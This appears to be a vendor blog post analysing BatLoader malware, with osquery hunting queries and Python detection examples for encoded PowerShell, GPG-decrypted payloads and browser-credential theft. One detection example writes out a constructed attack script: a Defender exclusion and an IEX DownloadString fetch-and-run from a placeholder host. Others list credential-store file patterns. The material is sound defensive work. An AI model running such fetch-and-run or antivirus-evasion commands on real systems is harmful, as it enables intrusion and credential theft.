Tracking BatLoader Malware Using Uptycs

Blog Author
Uptycs Team

Contributed by: Nandakumar KJ & Josh Lemon


BatLoader is a stealthy initial-access loader distributed through malvertising. Because of how deeply it embeds itself in a compromised system, it is difficult to remove completely. It also abuses legitimate tools for privilege elevation, payload decryption, and script execution in order to deploy second-stage malware (e.g., the Arkei/Vidar, Ursnif and Rhadamanthys infostealers, or a Cobalt Strike Beacon).


This blog post presents a technical analysis of the BatLoader malware along with a description of how Uptycs MDR analysts identify and remediate it. Where applicable, we include the SQL queries used in our investigation.


Technical Analysis

BatLoader typically arrives through malicious web pages posing as download sites for trustworthy software. Malvertising, and fake forum comments linking to BatLoader distribution sites, direct victims to these pages.


Uptycs recently observed a BatLoader infection that began with an encoded PowerShell script. The script used the WebClient.DownloadString method to fetch the next-stage content from a remote URL as a string on the local system.




Once the initial malicious PowerShell script runs, BatLoader executes additional PowerShell commands that add an exclusion to Windows Defender, a defense-evasion technique.


Windows Defender exclusions added by the PowerShell script


The PowerShell script also downloads three further files: zkoko.exe.gpg (the GPG-encrypted payload), Nsudo.exe, and gpg4win-2.2.5.exe, and executes the latter two. All three are written to the %USERPROFILE%\AppData\Roaming directory.
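The three behaviours above (a DownloadString fetch, a Defender exclusion, and the drop of the encrypted payload plus tooling into AppData\Roaming) can all be recovered from the encoded command line recorded in process telemetry. The following is an added example, not Uptycs code and not the script from the sample: it builds a constructed -EncodedCommand launch that mirrors those behaviours, decodes it the way powershell.exe does (base64 of the UTF-16LE script), and flags the indicators. The host name example.invalid and the script text are placeholders, not observed IOCs.

```python
"""Decode a PowerShell -EncodedCommand launch and flag BatLoader-style behaviours.

Added example, not Uptycs code. The script and command line below are constructed
for illustration; example.invalid is a placeholder, not an observed indicator.
"""
import base64
import re
from typing import List, Optional

# Constructed stage-one script mirroring the behaviour described in the post:
# DownloadString for the next stage, a Defender exclusion on the drop folder, and
# the three dropped files landing in %APPDATA% (AppData\Roaming).
SAMPLE_SCRIPT = r"""
Add-MpPreference -ExclusionPath $env:APPDATA
$w = New-Object System.Net.WebClient
IEX $w.DownloadString("http://example.invalid/stage2.ps1")
$w.DownloadFile("http://example.invalid/zkoko.exe.gpg", "$env:APPDATA\zkoko.exe.gpg")
$w.DownloadFile("http://example.invalid/gpg4win-2.2.5.exe", "$env:APPDATA\gpg4win-2.2.5.exe")
$w.DownloadFile("http://example.invalid/Nsudo.exe", "$env:APPDATA\Nsudo.exe")
"""


def encode_powershell(script: str) -> str:
    """powershell.exe -EncodedCommand takes base64 of the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process_events-style command line (constructed input, not captured telemetry).
SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_powershell(SAMPLE_SCRIPT)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if cmdline carries an encoded command, else None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


# Indicator name -> pattern over the decoded script (each checked per line).
INDICATORS = {
    "defender_exclusion": re.compile(r"Add-MpPreference\b.*-Exclusion(?:Path|Process|Extension)", re.I),
    "remote_string_exec": re.compile(r"(?:IEX|Invoke-Expression)\b.*DownloadString", re.I),
    "download_to_appdata": re.compile(r"DownloadFile\b.*(?:\$env:APPDATA|AppData\\Roaming)", re.I),
    "gpg_encrypted_payload": re.compile(r"\.gpg\b", re.I),
    "loader_tooling": re.compile(r"gpg4win|nsudo", re.I),
}


def score_cmdline(cmdline: str) -> dict:
    """Decode the command line and report which indicators fire; two or more is suspicious."""
    script = decode_encoded_command(cmdline)
    hits: List[str] = [] if script is None else [n for n, rx in INDICATORS.items() if rx.search(script)]
    return {"encoded": script is not None, "indicators": hits, "suspicious": len(hits) >= 2}


if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_CMDLINE))
    print(score_cmdline(SAMPLE_CMDLINE))
```

The decoder deliberately ignores prefixes such as -ExecutionPolicy, which also start with -e, and returns None for anything that is not valid base64, so a hunt over process_events can feed every powershell.exe command line through it without special-casing.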



Figure 3 - Domains accessed by PowerShell to collect second stage malware – osquery, DNS to process mapping


select * from dns_lookup_events where upt_asset_id ='ec2356f0-bbfa-8f79-ed7b-f6d972698e85' AND pid =1548 AND upt_time between timestamp '2023-03-01 05:50:00' AND timestamp '2023-03-01 06:10:00'



Figure 4 - Downloaded executables – Uptycs Real-Time Actions


The payload (zkoko.exe.gpg) is decrypted with GnuPG, which the downloaded gpg4win-2.2.5.exe package installs. Gpg4win is a legitimate and widely used Windows email and file encryption suite.




NSudo (Nsudo.exe) is a legitimate administration tool for launching programs with elevated privileges. In this attack it is used to run the decrypted payload with its window hidden, so nothing is visible to the victim while the payload executes; this is part of the loader's defense-evasion behavior.
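Neither gpg.exe nor NSudo is malicious on its own, so the useful signal is the chain: a GPG decrypt whose output file is then executed under a hidden-window launcher sharing the same PowerShell ancestor. The following is an added example, not Uptycs code, that correlates constructed process events into that chain. The pids, the GnuPG install path, the passphrase, and the NSudo switch names in the sample command lines are assumptions used for illustration, not values from the observed sample.

```python
"""Correlate a GPG decryption with execution of its output under a hidden-window launcher.

Added example, not Uptycs code. The process events below are constructed to mirror
the chain described in the post (PowerShell -> gpg decrypts zkoko.exe.gpg -> NSudo
launches the decrypted zkoko.exe). Pids, the gpg install path, the passphrase and the
NSudo switch names are assumptions for illustration only.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    parent: int
    path: str
    cmdline: str


ROAMING = r"C:\Users\Administrator\AppData\Roaming"

# Constructed process_events-style records (not captured telemetry).
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(1548, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoP -W Hidden -EncodedCommand <base64 omitted>"),
    ProcEvent(2010, 1548, ROAMING + r"\gpg4win-2.2.5.exe", "gpg4win-2.2.5.exe /S"),
    ProcEvent(2044, 1548, r"C:\Program Files (x86)\GNU\GnuPG\pub\gpg.exe",
              f'gpg.exe --batch --yes --passphrase "pw" -o {ROAMING}\\zkoko.exe -d {ROAMING}\\zkoko.exe.gpg'),
    ProcEvent(2100, 1548, ROAMING + r"\Nsudo.exe",
              f"Nsudo.exe -U:T -P:E -ShowWindowMode:Hide powershell.exe -command {ROAMING}\\zkoko.exe"),
    ProcEvent(2110, 2100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -command {ROAMING}\\zkoko.exe"),
    ProcEvent(2120, 2110, ROAMING + r"\zkoko.exe", ROAMING + r"\zkoko.exe"),
    # Benign control: a user decrypting a document that is never executed.
    ProcEvent(3001, 900, r"C:\Program Files (x86)\GNU\GnuPG\pub\gpg.exe",
              r"gpg.exe -o C:\Users\Administrator\Documents\report.pdf -d C:\Users\Administrator\Documents\report.pdf.gpg"),
]

GPG_DECRYPT = re.compile(r"(?:^|\s)(?:-d|--decrypt)(?:\s|$)")
GPG_OUTPUT = re.compile(r'(?:^|\s)(?:-o|--output)\s+("[^"]+"|\S+)')


def decrypted_outputs(events: List[ProcEvent]) -> Dict[str, ProcEvent]:
    """Map each gpg decrypt's output path (lower-cased) to the gpg process that produced it."""
    outputs: Dict[str, ProcEvent] = {}
    for e in events:
        if e.path.lower().endswith("\\gpg.exe") and GPG_DECRYPT.search(e.cmdline):
            m = GPG_OUTPUT.search(e.cmdline)
            if m:
                outputs[m.group(1).strip('"').lower()] = e
    return outputs


def ancestry(by_pid: Dict[int, ProcEvent], pid: int) -> List[ProcEvent]:
    """Walk parent pointers upward; nearest ancestor first, safe against pid reuse loops."""
    chain: List[ProcEvent] = []
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].parent
    return chain


def find_decrypted_payload_launches(events: List[ProcEvent]) -> List[dict]:
    """Flag every process whose image is the output of a gpg decrypt, with launch context."""
    by_pid = {e.pid: e for e in events}
    outputs = decrypted_outputs(events)
    findings = []
    for e in events:
        target = e.path.lower()
        if target not in outputs:
            continue
        gpg_event = outputs[target]
        chain = ancestry(by_pid, e.pid)
        findings.append({
            "payload": target,
            "payload_pid": e.pid,
            "decrypted_by_pid": gpg_event.pid,
            "chain": [a.pid for a in chain],
            "hidden_launcher": any("nsudo" in a.path.lower() and "showwindowmode:hide" in a.cmdline.lower()
                                   for a in chain),
            "shares_root_with_decryptor": any(a.pid == gpg_event.parent for a in chain),
        })
    return findings


if __name__ == "__main__":
    for finding in find_decrypted_payload_launches(SAMPLE_EVENTS):
        print(finding)
```

The benign control decrypt produces no finding because its output is never executed; only the payload run reports a chain, and the hidden_launcher and shares_root_with_decryptor flags are what separate this from an administrator legitimately decrypting and running a file.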




The infostealer dropped by BatLoader collects sensitive data from the victim system via the Windows API, including disk drive and disk type information, BIOS and processor details, the computer name, and the serial number.

It also crawls the profile directories of installed browsers to collect browsing history, bookmarks, cookies, autofill data, and saved login passwords. Once collected, the data is relayed to the threat actor's server. In the sample we observed, the command-and-control (C2) server is associated with the Rhadamanthys malware family.
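The browser-artifact collection described above has a simple file-level tell: a process that is not a browser opening the credential, cookie and history stores inside a browser profile. The following is an added example, not Uptycs code, of that check run over constructed file events. The zkoko.exe process name follows the post; the profile paths are the standard Chromium-family and Firefox locations; the event layout is an assumption for illustration rather than the osquery file_events schema.

```python
"""Flag non-browser processes reading browser credential, cookie and history stores.

Added example, not Uptycs code. The file events below are constructed; the event
layout is an assumption, not the osquery file_events schema.
"""
import re
from typing import Dict, List, Optional, Tuple

# Artifact stores the post describes the stealer collecting, by browser family.
SENSITIVE_FILES = {
    "chromium": {"login data", "cookies", "history", "bookmarks", "web data"},  # Web Data holds autofill
    "firefox": {"logins.json", "key4.db", "cookies.sqlite", "places.sqlite", "formhistory.sqlite"},
}
# Profile directory markers, matched against the lower-cased path.
PROFILE_DIRS = {
    "chromium": re.compile(r"\\(?:google\\chrome|microsoft\\edge|bravesoftware\\brave-browser)\\user data\\"),
    "firefox": re.compile(r"\\mozilla\\firefox\\profiles\\"),
}
# Processes expected to touch their own stores.
BROWSER_PROCESSES = {"chrome.exe", "msedge.exe", "brave.exe", "firefox.exe"}

ROAMING = r"C:\Users\Administrator\AppData\Roaming"
CHROME = r"C:\Users\Administrator\AppData\Local\Google\Chrome\User Data"
FIREFOX = ROAMING + r"\Mozilla\Firefox\Profiles"

# Constructed file-access events (not captured telemetry).
SAMPLE_FILE_EVENTS: List[dict] = [
    {"pid": 2120, "process": ROAMING + r"\zkoko.exe", "path": CHROME + r"\Default\Login Data"},
    {"pid": 2120, "process": ROAMING + r"\zkoko.exe", "path": CHROME + r"\Default\Cookies"},
    {"pid": 2120, "process": ROAMING + r"\zkoko.exe", "path": CHROME + r"\Default\Preferences"},  # not a store
    {"pid": 2120, "process": ROAMING + r"\zkoko.exe", "path": FIREFOX + r"\abcd1234.default-release\logins.json"},
    {"pid": 4400, "process": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "path": CHROME + r"\Default\Login Data"},
    {"pid": 5000, "process": r"C:\Windows\explorer.exe", "path": r"C:\Users\Administrator\Documents\notes.txt"},
]


def classify(path: str) -> Optional[Tuple[str, str]]:
    """Return (browser family, artifact name) if path is a known sensitive store, else None."""
    low = path.lower()
    name = low.rsplit("\\", 1)[-1]
    for family, rx in PROFILE_DIRS.items():
        if rx.search(low) and name in SENSITIVE_FILES[family]:
            return family, name
    return None


def find_stealer_reads(events: List[dict]) -> Dict[int, List[str]]:
    """Group sensitive-store reads by pid, ignoring the browsers that own the stores."""
    hits: Dict[int, List[str]] = {}
    for ev in events:
        proc = ev["process"].lower().rsplit("\\", 1)[-1]
        if proc in BROWSER_PROCESSES:
            continue
        found = classify(ev["path"])
        if found:
            hits.setdefault(ev["pid"], []).append(f"{found[0]}:{found[1]}")
    return hits


if __name__ == "__main__":
    print(find_stealer_reads(SAMPLE_FILE_EVENTS))
```

One process reading stores from more than one browser family within a short window is a stronger signal than a single read, which is why the result is grouped per pid rather than emitted per event.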



Figure 7 - C2 server connection – contextual details in the Uptycs detection UI


Uptycs MDR

The Uptycs managed detection and response engine includes built-in behavioral rules, YARA signatures, and threat intelligence data. Our security analysts continuously monitor detections and hunt for widespread and active threats across customer environments.


From this BatLoader sample, we observed the victim system also being infected with Rhadamanthys. It was detected by YARA signatures matching in memory, by behavioral rules covering the actions this malware is known to perform, and by Uptycs threat intelligence matches.


Uptycs EDR contextual detection also provides important details about the identified malware, its behaviors mapped to the ATT&CK matrix (left pane, below), and a detection graph that shows process ancestry. Users can navigate to the toolkit data section of the detection and click the name to learn more.



Figure 8 - Rhadamanthys detection


Built on osquery, the Uptycs agent collects extensive, high-quality telemetry from endpoints, cloud resources, and Kubernetes clusters. The telemetry is exposed through osquery tables (e.g., process_events, powershell_events, scheduled_tasks). The open-source schema is published by the osquery project; Uptycs adds a significant number of additional tables to it.


Using the Uptycs Investigate feature, we ran SQL queries against the osquery tables holding data collected from the endpoint on which we executed the malware, to investigate the malicious activity further.



Figure 9 - Searching process_events for activity by the suspicious user


select * from process_events where upt_asset_id ='ec2356f0-bbfa-8f79-ed7b-f6d972698e85' AND login_name = 'Administrator' AND upt_time between timestamp '2023-03-01 05:45:00' AND timestamp '2023-03-01 06:10:00'


Figure 10 - Searching socket_events to find executables that connect to the C2 server


select * from socket_events where upt_asset_id ='ec2356f0-bbfa-8f79-ed7b-f6d972698e85' AND upt_day =20230301 AND remote_address =''


Figure 11 - Searching api_events to find the API calls made by zkoko.exe


select * from api_events where upt_asset_id ='ec2356f0-bbfa-8f79-ed7b-f6d972698e85' and cmdline like '%powershell.exe  -command C:\Users\Administrator\AppData\Roaming\zkoko.exe%'


The Uptycs Managed Detection and Response (MDR) team responds to threats using the Uptycs Protect remediation and blocking feature. Working from the detection graph of the malicious activity (below), it lets you kill, delete, or pause the process, scan the binary with YARA rules, or collect the file for further analysis. It also allows managing users, running scripts on the host, quarantining the machine, or investigating the malicious process further.



Figure 12 - Uptycs Protect – detection graph


Monitoring all potential threats in an environment is essential, especially those that abuse legitimate tools to hide their presence, as BatLoader does. The Uptycs MDR team makes this possible by detecting and responding to threats in our customers' environments.


Indicators of Compromise (IOCs)


File name    MD5 hash

Domain/URL/IP Address

Malware Samples